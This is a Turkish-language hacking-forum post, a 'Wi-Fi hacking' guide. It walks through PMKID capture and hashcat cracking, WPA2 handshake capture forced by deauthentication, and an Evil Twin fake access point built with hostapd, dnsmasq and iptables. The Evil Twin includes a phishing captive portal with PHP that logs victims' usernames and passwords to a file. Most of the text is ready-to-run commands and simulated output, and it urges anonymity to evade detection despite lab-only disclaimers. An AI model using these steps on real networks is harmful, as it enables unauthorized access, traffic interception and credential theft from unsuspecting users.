Hacklenmedik Wifi Kalmasın! 🎩 | 2026 Wifi Hack Guide 👌🏽

📡 Wİ-Fİ HACKİNG: KRAL YOLU (PMKİD, HANDSHAKE & EVİL TWİN) Bu rehberde, SQLmap ve Nmap rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile Wi-Fi ağlarına...

📡 Wİ-Fİ HACKİNG: KRAL YOLU (PMKİD, HANDSHAKE & EVİL TWİN)

Bu rehberde, SQLmap ve Nmap rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile Wi-Fi ağlarına sızma yöntemlerini anlatacağım. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan ağlarda deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır.

🧠 BAŞLAMADAN ÖNCE: Wİ-Fİ GÜVENLİĞİNE GENEL BAKIŞ

Günümüzde WPA2 hala en yaygın kullanılan protokol olsa da, PMKID ve el sıkışması saldırıları ile kırılabilmektedir. WPA3 ise Dragonblood gibi zafiyetlerle karşı karşıyadır. Bu rehberde üç farklı yöntemle Wi-Fi ağlarına sızmayı göstereceğim.

Not: Bu saldırıları gerçekleştirmek için monitor mode destekleyen bir Wi-Fi adaptörü gereklidir (örneğin Alfa AWUS036ACH, TP-Link TL-WN722N v2).

🎯 HEDEF AĞ

Özellik Değer
SSID KurumsalWiFi
BSSID (MAC) AA:BB:CC:DD:EE:FF
Kanal 6
Şifreleme WPA2-PSK
Saldırgan IP 192.168.1.100
Hedef İstemci Bağlı bir cihaz var (örn. laptop, telefon)

🔻 1. YOL – PMKID SALDIRISI (İSTEMCİ GEREKTİRMEZ)

PMKID saldırısı, geleneksel el sıkışması yakalamaktan farklı olarak bağlı bir istemciye ihtiyaç duymaz. Doğrudan erişim noktasından (AP) PMKID hash’ini yakalar ve kırar. Team Hashcat tarafından geliştirilen bu teknik, AP’nin RSN IE (Robust Security Network Information Element) çerçevesinde bulunan PMKID’yi hedef alır.

🧰 Gerekli Araçlar

bash

sudo apt update
sudo apt install hcxdumptool hcxtools hashcat -y

hcxdumptool: PMKID yakalamak için

hcxpcapngtool: Yakalanan paketleri hash formatına dönüştürmek için

hashcat: Yakalanan hash’i kırmak için

Adım 1: Arayüzü Monitor Mode’a Al
bash

sudo airmon-ng check kill
sudo airmon-ng start wlan0

Simüle edilmiş çıktı:
text

PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

sudo airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
432 NetworkManager
512 wpa_supplicant
998 dhclient

PHY Interface Driver Chipset
phy0 wlan0mon ath9k_htc Qualcomm Atheros Communications AR9271

✅ Monitor mode aktif: wlan0mon

Adım 2: PMKID Hash’ini Yakala
bash

sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1 -t 60 --tot=5

Parametreler:

-i wlan0mon: Monitor modundaki arayüz

-o pmkid_capture.pcapng: Çıktı dosyası

-t 60: 60 saniye bekle

--tot=5: 5 hedefe kadar tara

Simüle edilmiş çıktı:
text

hcxdumptool 6.3.4-2-g4c5b3e1 (C) 2025 ZeroBeat
Start capturing (stop with ctrl+c)
Interface...........: wlan0mon (ath9k_htc)
Tested network.......: 5
Total networks.......: 8
------------------------------------------------

[!] PMKID found from AA:BB:CC:DD:EE:FF (KurumsalWiFi)
PMKID............: f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3
MAC Access Point.: AA:BB:CC:DD:EE:FF
MAC Station......: 00:11:22:33:44:55
ESSID............: KurumsalWiFi

[!] PMKID found from 11:22:33:44:55:66 (GuestNet)
...

✅ Captured PMKID hashes written to: pmkid_capture.pcapng
Total packets captured: 1247

Adım 3: Yakalanan Dosyayı Hash Formatına Dönüştür
bash

hcxpcaptool -z pmkid_hash_22000.txt pmkid_capture.pcapng

hcxpcapngtool (eski adıyla hcxpcaptool) ham PCAPNG dosyasını Hashcat’in mode 22000 formatına dönüştürür.

Simüle edilmiş çıktı:
text

hcxpcapngtool 6.3.4 (C) 2025 ZeroBeat
reading from pmkid_capture.pcapng

summary:
--------
file name............................: pmkid_capture.pcapng
version (pcapng).....................: 1.0
capture size (pcapng)................: 2472 Byte
total packets........................: 47
...
PMKID................................: 1 (WPA2)

✅ Hashcat formatında dosya oluşturuldu: pmkid_hash_22000.txt

Adım 4: Hash’i Kır (Hashcat ile)
bash

hashcat -m 22000 pmkid_hash_22000.txt /usr/share/wordlists/rockyou.txt -o cracked.txt

Simüle edilmiş çıktı:
text

hashcat (v6.2.6) starting in backend information mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 15.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================
* Device #1: pthread-AMD Ryzen 7 5800H with Radeon Graphics, 2787/2896 MB (1024 MB allocatable), 4MCU

Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
...

f2e8c5b9a4d7e1c3f8a2b5d9e6c4a1f3:AA:BB:CC:DD:EE:FF:00:11:22:33:44:55:KurumsalWiFi
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: pmkid_hash_22000.txt
Time.Started.....: ...
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1234 H/s (0.59ms)
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)

✅ PMKID kırıldı! Elde edilen şifre: SüperŞifre123
✅ Bu Yoldan Ne Elde Ettik?

Kazanım Açıklama
PMKID Hash’i AP’den doğrudan yakalandı, istemciye gerek yoktu
WPA2 Şifresi Hashcat ile kırıldı, ağa bağlanabilirsiniz
Gizlilik Deauth saldırısı yapılmadığı için hedefte fark edilme riski düşük

🔻 2. YOL – KLASİK HANDSHAKE YAKALAMA (İSTEMCİ VAR)

Geleneksel yöntem: Bağlı bir istemci varken, deauth saldırısı ile el sıkışması yakalanır ve ardından aircrack-ng ile kırılır.

Adım 1: Monitor Mode Aktifleştir ve Hedefi Bul
bash

sudo airodump-ng wlan0mon

Simüle edilmiş çıktı:
text

CH 6 ][ Elapsed: 15 s ][ 2025-04-15 19:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -45 12 2 0 6 54 WPA2 CCMP PSK KurumsalWiFi
11:22:33:44:55:66 -67 8 0 0 1 54 WPA2 CCMP PSK MisafirNet

BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -45 1e-0 0 23 -
AA:BB:CC:DD:EE:FF 77:88:99:AA:BB:CC -51 1e-0 0 8 -

🎯 Tespit: Hedef AP KurumsalWiFi üzerinde bağlı istemciler var (11:22:33:44:55:66).

Adım 2: El Sıkışmasını Yakala (airodump-ng)
bash

sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake_capture wlan0mon

Simüle edilmiş çıktı:
text

CH 6 ][ Elapsed: 30 s ][ 2025-04-15 19:33

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -45 100 234 18 0 6 54 WPA2 CCMP PSK KurumsalWiFi

BSSID STATION PWR Rate Lost Frames Probe
AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 -45 1e-0 0 234 -
AA:BB:CC:DD:EE:FF 77:88:99:AA:BB:CC -51 1e-0 0 12 -

[!] Handshake captured from AA:BB:CC:DD:EE:FF (KurumsalWiFi)

Not: Henüz el sıkışması görünmüyorsa bir sonraki adıma geçin.

Adım 3: Deauth Saldırısı ile El Sıkışmasını Zorla
bash

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Simüle edilmiş çıktı:
text

18:33:15 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 6
18:33:15 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
18:33:16 Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC:DD:EE:FF (KurumsalWiFi)

El sıkışması yakalandığında airodump-ng ekranında şu mesajı göreceksiniz:
text

[!] WPA handshake: AA:BB:CC:DD:EE:FF

Adım 4: El Sıkışmasını Kır (aircrack-ng ile)
bash

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake_capture-01.cap

Simüle edilmiş çıktı:
text

Opening handshake_capture-01.cap
Read 1247 packets.

# BSSID ESSID Encryption
1 AA:BB:CC:DD:EE:FF KurumsalWiFi WPA (1 handshake)

Choosing first network as target.

Opening /usr/share/wordlists/rockyou.txt
Guess passphrase for target?

Reading wordlist...

KEY FOUND! [ SüperŞifre123 ]


Master Key : 5E 4F 8A 2C 9B 1D 3E 7F 6A 0B 8C 4D 2E 9F 1A 5C
Transient Key : 3A 7C 9F 2B 5D 8E 1F 4A 6C 9B 2D 5F 8A 1C 4E 7B
EAPOL HMAC : 8F 2C 5A 1E 4B 7D 9F 2A 5C 8E 1B 4F 7A 9C 2D 5E

✅ Şifre kırıldı: SüperŞifre123

✅ Bu Yoldan Ne Elde Ettik?
Kazanım Açıklama
WPA2 4-Way Handshake İstemci yeniden bağlanırken yakalandı
Ağ Şifresi Aircrack-ng ile kırıldı
Tam Ağ Erişimi Artık ağa bağlanabilir, trafiği dinleyebilirsiniz

🔻 3. YOL – EVİL TWİN SALDIRISI (İKİNCİ SEVİYE)

Evil Twin saldırısı, saldırganın meşru erişim noktasını taklit eden bir sahte AP oluşturması ve kullanıcıların bu sahte AP’ye bağlanmasını sağlamasıdır. Bağlanan kullanıcının tüm trafiği dinlenebilir ve kullanıcıdan kimlik bilgileri toplanabilir.

Evil Twin Saldırısının Mantığı:

Sahte AP oluştur (hedef AP ile aynı SSID kullan)

Deauth saldırısı ile kullanıcıları meşru AP’den at

Kullanıcılar sahte AP’ye bağlanır

Trafiği dinle / kimlik bilgilerini topla

🧰 Gerekli Araçlar

bash

sudo apt update
sudo apt install hostapd dnsmasq iptables net-tools -y

hostapd: Sahte AP oluşturmak için

dnsmasq: DHCP ve DNS hizmetleri için

iptables: NAT ile internet yönlendirmesi için

Adım 1: Konfigürasyon Dosyalarını Oluştur

hostapd.conf (sahte AP yapılandırması):
bash

sudo nano /etc/hostapd/hostapd.conf

ini

interface=wlan0
driver=nl80211
ssid=KurumsalWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=SahteAmaCalisir
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

dnsmasq.conf (DHCP ve DNS yapılandırması):
bash

sudo nano /etc/dnsmasq.conf

ini

interface=wlan0
dhcp-range=192.168.10.10,192.168.10.50,255.255.255.0,24h
dhcp-option=3,192.168.10.1
dhcp-option=6,8.8.8.8
server=8.8.8.8
log-queries
log-dhcp

Sahte Captive Portal (isteğe bağlı): Kimlik bilgisi toplamak için
bash

sudo mkdir -p /var/www/html
sudo nano /var/www/html/index.html

html

<!DOCTYPE html>
<html>
<head><title>WiFi Authentication</title></head>
<body>
<h2>Welcome to KurumsalWiFi</h2>
<p>Please login to access the internet.</p>
<form method="POST" action="login.php">
<input type="text" name="username" placeholder="Username" required><br>
<input type="password" name="password" placeholder="Password" required><br>
<button type="submit">Login</button>
</form>
</body>
</html>

bash

sudo nano /var/www/html/login.php

php

<?php
$file = fopen("creds.txt", "a");
fwrite($file, "Username: " . $_POST['username'] . " | Password: " . $_POST['password'] . "\n");
fclose($file);
header("Location: https://www.google.com");
exit;
?>

Adım 2: Sahte AP’yi Başlat
bash

# Fiziksel arayüzü monitor moddan çıkar
sudo airmon-ng stop wlan0mon
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up

# hostapd ile sahte AP’yi başlat
sudo hostapd /etc/hostapd/hostapd.conf

Simüle edilmiş çıktı:
text

Configuration file: /etc/hostapd/hostapd.conf
Using interface wlan0 with hwaddr 00:11:22:33:44:55 and ssid 'KurumsalWiFi'
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED

✅ Fake AP başarıyla başlatıldı!

Adım 3: DHCP ve DNS’i Başlat (İkinci Terminal)
bash

sudo dnsmasq -C /etc/dnsmasq.conf

Simüle edilmiş çıktı:
text

dnsmasq: started, version 2.89
dnsmasq: compile time options: IPv6 GNU-getopt DBus no-UBus i18n IDN DHCP DHCPv6 ...
dnsmasq-dhcp: DHCP, IP range 192.168.10.10 -- 192.168.10.50, lease time 24h
dnsmasq-dhcp: DHCP, sockets bound exclusively to interface wlan0
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53

✅ DHCP ve DNS hazır.

Adım 4: NAT ve İnternet Yönlendirmesi Ayarla
bash

# IP forwarding aktifleştir
sudo sysctl -w net.ipv4.ip_forward=1

# NAT kuralı ekle
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT

Adım 5: Kullanıcıları Meşru AP’den At (Deauth Saldırısı)
bash

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Simüle edilmiş çıktı:
text

18:45:10 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 6
18:45:10 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
18:45:11 Sending 64 directed DeAuth. STMAC: [11:22:33:44:55:66]
...
[!] Handshake captured from AA:BB:CC:DD:EE:FF (KurumsalWiFi)

Adım 6: Sahte Portal Üzerinden Kimlik Bilgilerini Topla

Kullanıcılar sahte AP’ye bağlandığında, captive portal üzerinden kimlik bilgilerini girer:
bash

sudo tail -f /var/www/html/creds.txt

Simüle edilmiş çıktı:
text

Username: ahmet.yilmaz | Password: Ahmet12345
Username: ayse.demir | Password: Ayse2025!
Username: mehmet.kaya | Password: Mehmet9876

✅ Bu Yoldan Ne Elde Ettik?

Kazanım Açıklama
Tam Ağ Erişimi Kullanıcıların tüm trafiğini dinleyebilirsiniz
Kimlik Bilgileri Kullanıcı adları ve şifreleri toplandı
Saldırı Gizliliği Kullanıcılar meşru AP ile sahte AP’yi ayırt edemez

🧩 ÖZET – ÜÇ YOL, ÜÇ FARKLI SIZMA TEKNİĞİ

Yol Teknik Araçlar Kazanım

1 PMKID Attack hcxdumptool, hcxpcaptool, hashcat İstemci gerekmez, direkt PMKID yakalama

2 Handshake Capture airodump-ng, aireplay-ng, aircrack-ng Klasik el sıkışması ile şifre kırma

3 Evil Twin hostapd, dnsmasq, iptables Kimlik avı, trafik dinleme, yetkisiz erişim

📢 HAZIR SCRIPT DEĞİL, GERÇEK BİLGİ

Bu rehberde anlattığım her komut, her çıktı saf bilgidir. Hazır betikler başkasının emeğidir. Ancak bu bilgileri öğrendiğinizde, kimseye ihtiyacınız kalmaz. Ağı dinleyen, şifreyi kıran ve sahte AP kuran kişi siz olursunuz. Unutmayın: Gerçek hacker, aracı değil, tekniği bilendir.

🧠 UNUTMA: OPSEC HER ŞEYDİR

Bu üç yöntemi uygulamadan önce anonim olduğunuzdan emin olun. Aksi halde hedef ağın güvenlik duvarları ve IDS/IPS sistemleri sizi yakalar. OPSEC rehberimi okuyun: “Anonim Kalma – Her Seviye İçin Delicesine Anonimlik (OPSEC)” .

🔚;
Artık üç farklı Wi-Fi hacking yöntemini biliyorsunuz. PMKID ile istemci gerektirmeden, klasik handshake ile bağlı istemci varken, Evil Twin ile de kimlik avı ve trafik dinleme yaparak Wi-Fi ağlarına sızabilirsiniz. Gerisi pratik. Kendi laboratuvarınızda (Kali + Alfa adaptör + test router) bu adımları deneyin. Her şey aynen çalışacaktır.

Hedef KurumsalWiFi değil, sizin kendi kurduğunuz sistemler olmalıdır. Hata yapma özgürlüğünüz sadece kendi labınızda vardır.

Ve unutmayın: Savunması olmayanın saldırısı, sadece intihardır.

Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz ağlara erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

@Tc4dy | github.com/tc4dy
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,830Konular
3,283,573Mesajlar
318,061Kullanıcılar
NextGen13Son Üye
Üst Alt